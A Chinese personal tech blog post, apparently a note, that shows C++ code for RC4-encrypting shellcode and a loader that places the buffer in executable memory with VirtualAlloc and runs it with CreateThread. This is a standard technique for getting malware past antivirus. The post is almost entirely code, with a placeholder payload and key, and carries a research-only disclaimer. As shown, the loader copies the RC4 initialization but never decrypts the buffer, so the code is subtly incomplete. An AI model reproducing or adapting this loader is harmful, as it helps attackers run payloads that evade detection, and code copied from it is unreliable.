57uv6Z6g55qE5Y2a5a6i

MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究，请勿非法破坏，请遵守相关法律法规，后果自负

【笔记】ShellCode通过C++进行RC4加密

发表于 2024-08-15 更新于 2025-12-26 阅读次数：

前言

ShellCode通过C++进行RC4加密

准备工作

生成ShellCode十六进制数组

RC4加密ShellCode

<secret>：密钥
\x00\x00\x00\x00：Shell十六进制数组

#include <stdio.h>
#include <windows.h>
#include <iostream>

using namespace std;

unsigned char T[256] = { 0 };

int rc4_init(unsigned char* s, unsigned char* key, unsigned long Len)
{
    int i = 0, j = 0;

    unsigned char t[256] = { 0 };
    unsigned char tmp = 0;
    for (i = 0; i < 256; i++) {
        s[i] = i;
        t[i] = key[i % Len];
    }
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + t[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }

    for (int i = 0; i < 256; i++)
    {
        T[i] = s[i];
        cout << "0x" << hex << (int)T[i] << ',';
    }
    cout << endl;
    return 0;
}

int rc4_crypt(unsigned char* s, unsigned char* buf, unsigned long Len)
{
    int i = 0, j = 0, t = 0;
    unsigned char tmp;
    for (int k = 0; k < Len; k++)
    {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        t = (s[i] + s[j]) % 256;
        buf[k] ^= s[t];
    }
    return 0;
}

unsigned int main()
{
    char key[] = "<secret>";
    unsigned char buf[] = "\x00\x00\x00\x00";

    unsigned char s[256];
    rc4_init(s, (unsigned char*)key, strlen(key));
    
    for (size_t i = 0; i < sizeof(buf); i++)
    {
        rc4_crypt(s, &buf[i], sizeof(buf[i]));
        printf("\\x%02x", buf[i]);
    }
    return 0;
}

加载器执行加密后的ShellCode

<secret>：密钥
\x00\x00\x00\x00：Shell十六进制数组

#include <stdio.h>
#include <windows.h>
#include <iostream>

using namespace std;

unsigned char T[256] = { 0 };

int rc4_init(unsigned char* s, unsigned char* key, unsigned long Len)
{
    int i = 0, j = 0;

    unsigned char t[256] = { 0 };
    unsigned char tmp = 0;
    for (i = 0; i < 256; i++) {
        s[i] = i;
        t[i] = key[i % Len];
    }
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + t[i]) % 256;
        tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }

    for (int i = 0; i < 256; i++)
    {
        T[i] = s[i];
        cout << "0x" << hex << (int)T[i] << ',';
    }
    cout << endl;
    return 0;
}

unsigned int main()
{
    char key[] = "<secret>";
    unsigned char buf[] = "\x00\x00\x00\x00";

    unsigned char s[256];
    rc4_init(s, (unsigned char*)key, strlen(key));
    
    LPVOID add = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(add, buf, sizeof(buf));
    HANDLE handle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)add, 0, 0, 0);
    WaitForSingleObject(handle, INFINITE);
    return 0;
}

完成

0%